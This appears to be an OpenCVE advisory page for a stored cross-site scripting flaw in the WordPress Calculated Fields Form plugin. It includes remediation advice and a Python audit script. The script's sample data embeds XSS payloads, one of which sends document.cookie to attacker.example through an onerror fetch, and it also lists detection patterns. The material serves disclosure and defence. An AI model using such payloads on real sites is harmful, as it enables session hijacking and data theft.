Description
The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form settings in all versions up to, and including, 5.4.5.0. This is due to insufficient capability checks on the form settings save handler and insufficient input sanitization of the `fcontent` field in `fhtml` field types. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-03-13
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Patch Immediately
AI Analysis

Impact

The Calculated Fields Form plugin for WordPress has a stored cross-site scripting flaw caused by missing capability checks on the form settings save handler and missing sanitization of the fcontent field in fhtml field types. An authenticated user with Contributor-level access or higher can store arbitrary JavaScript in a form, and that script executes in the browser of every visitor who loads a page containing the form. Because the payload runs in the visitor's session rather than the attacker's, a logged-in administrator who views the page is exposed as well, so the realistic outcomes include session hijacking, defacement and other browser-side attacks against the confidentiality and integrity of the site's data.

Affected Systems

Any WordPress installation running CodePeople's Calculated Fields Form plugin at version 5.4.5.0 or earlier is affected. The advisory states that the flaw is present in every release up to and including 5.4.5.0 and gives no lower bound, so treat any installed version at or below 5.4.5.0 as vulnerable.

Risk and Exploitability

The CVSS v3.1 vector is AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N, scoring 6.4 (Medium); scope is Changed because the injected script runs in visitors' browsers rather than in the component that holds the flaw. The EPSS score is below 1%, the SSVC assessment records Exploitation: none and Automatable: no, and the CVE is not listed in the CISA KEV catalog. Exploitation requires an authenticated account with Contributor-level privileges or higher, so the most likely attacker is a malicious insider, a guest author, or anyone who has compromised a Contributor account. The overall risk is moderate, but the impact grows with the privilege of the users who view the injected page.

Generated by OpenCVE AI on March 19, 2026 at 17:52 UTC.

Remediation

The CVE record lists no vendor advisory or workaround. The affected range is bounded at 5.4.5.0, which implies that releases after 5.4.5.0 contain the fix; confirm this against the plugin's changelog before relying on an upgrade alone.

OpenCVE Recommended Actions

  • Upgrade Calculated Fields Form to a release newer than 5.4.5.0, after confirming in the plugin changelog that the release addresses this issue.
  • Audit forms that already exist: upgrading sanitizes future saves but does not clean fhtml fields whose fcontent was injected before the patch. Review every fhtml block for script tags, on* event handler attributes and javascript: URLs, and remove or re-save any that contain them.
  • If an upgrade cannot be performed immediately, reduce the number of accounts holding Contributor or higher roles and review their recent activity. Because the weakness is a missing capability check in the save handler itself, hiding the plugin's settings page from lower roles may not stop a direct request to that handler.
  • As a last resort, disable or uninstall the Calculated Fields Form plugin until a patched version is available.
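One way to perform that audit of already-stored forms, as an added example that is not part of the OpenCVE page or of the plugin's own code: the script below parses a form definition and flags fhtml fields whose fcontent contains script-capable markup. The JSON layout (a fields list whose entries carry ftype and fcontent keys) and the sample form are constructed assumptions for this example; only the names fhtml and fcontent come from the advisory.

```python
import json
from html.parser import HTMLParser

# Constructed sample form definition. The layout (a "fields" list whose
# entries carry "ftype" and "fcontent") is an assumption made for this
# example; only the names fhtml and fcontent come from the advisory.
SAMPLE_FORM_JSON = json.dumps({
    "id": 1,
    "fields": [
        {"name": "fieldname1", "ftype": "ftext", "title": "Name"},
        {"name": "fieldname2", "ftype": "fhtml",
         "fcontent": "<p>Please fill in the <b>required</b> fields.</p>"},
        {"name": "fieldname3", "ftype": "fhtml",
         "fcontent": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"},
        {"name": "fieldname4", "ftype": "fhtml",
         "fcontent": "<a href=\"java\tscript:alert(1)\">Help</a><script>alert(2)</script>"},
    ],
})

# Tags that should never appear in a form's static HTML block: they run or
# load script, or change how the rest of the page resolves URLs.
UNEXPECTED_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
                   "base", "meta", "link", "form"}
# Attributes whose value is a URL and can therefore carry a script scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


class ScriptFinder(HTMLParser):
    """Record tags and attributes in an HTML fragment that can execute script."""

    def __init__(self):
        # Attribute values are entity-decoded by the parser, so an encoded
        # scheme such as &#106;avascript: is seen as javascript: here.
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in UNEXPECTED_TAGS:
            self.findings.append(f"tag <{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and value:
                # Browsers ignore whitespace inside a scheme, so "java\tscript:"
                # must be collapsed before matching.
                scheme = "".join(value.split()).lower()
                if scheme.startswith(SCRIPT_SCHEMES):
                    self.findings.append(
                        f"{name} on <{tag}> uses {scheme.split(':', 1)[0]}: URL")


def audit_form(form_json):
    """Return {field name: [findings]} for every fhtml field that needs review."""
    form = json.loads(form_json)
    report = {}
    for field in form.get("fields", []):
        if field.get("ftype") != "fhtml":
            continue
        finder = ScriptFinder()
        finder.feed(field.get("fcontent", ""))
        finder.close()
        if finder.findings:
            report[field["name"]] = finder.findings
    return report


if __name__ == "__main__":
    for name, findings in audit_form(SAMPLE_FORM_JSON).items():
        print(f"{name}: review needed")
        for finding in findings:
            print(f"  - {finding}")
```

Where the plugin stores its form definitions depends on the installed version and the site's table prefix, so export each form with the plugin's own export function or query the database directly, then pass each definition to audit_form. The check is a review aid, not a sanitizer: fields it flags should be inspected by hand and either cleaned or re-saved through the patched plugin, and a benign fhtml block can still be changed by a Contributor until the upgrade is done.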

Advisories

No advisories yet.

History

Mon, 16 Mar 2026 10:15:00 +0000

Type                  Values Removed   Values Added
First Time appeared   (none)           Codepeople; Codepeople Calculated Fields Form; Wordpress; Wordpress wordpress
Vendors & Products    (none)           Codepeople; Codepeople Calculated Fields Form; Wordpress; Wordpress wordpress

Fri, 13 Mar 2026 17:15:00 +0000

Type      Values Removed   Values Added
Metrics   (none)           ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 13 Mar 2026 08:45:00 +0000

Type          Values Removed   Values Added
Description   (none)           The CVE description shown at the top of this page
Title         (none)           Calculated Fields Form <= 5.4.5.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Form Settings
Weaknesses    (none)           CWE-79
References    (none)           (none recorded)
Metrics       (none)           cvssV3_1: {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


Subscriptions

Codepeople Calculated Fields Form
Wordpress Wordpress
MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-03-13T16:03:46.416Z

Reserved: 2026-03-11T14:57:10.292Z

Link: CVE-2026-3986

Vulnrichment

Updated: 2026-03-13T16:03:41.432Z

NVD

Status: Awaiting Analysis

Published: 2026-03-13T19:55:12.937

Modified: 2026-03-16T14:53:46.157

Link: CVE-2026-3986

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-23T09:59:38Z

Weaknesses